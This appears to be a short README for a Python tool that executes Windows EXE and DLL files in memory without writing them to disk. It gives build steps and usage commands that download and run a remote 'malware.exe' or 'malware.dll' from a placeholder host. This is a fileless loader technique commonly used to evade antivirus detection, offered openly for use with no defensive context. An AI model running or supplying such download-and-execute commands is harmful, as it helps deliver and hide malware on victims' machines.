execute any PE (dll,exe) in memory filelessly
pyMemory.py < url> < TYPe >
use pyinstaller or nuitka and build pymemory.py
or use the prebuilt exe in ./output
exe : PyexecMemory.exe http://example.com/malware.exe EXE
dll: PyexecMemory.exe http://example.com/malware.dll DLL --Method DLLRegisterServer
https://github.com/naksyn/PythonMemoryModule
https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/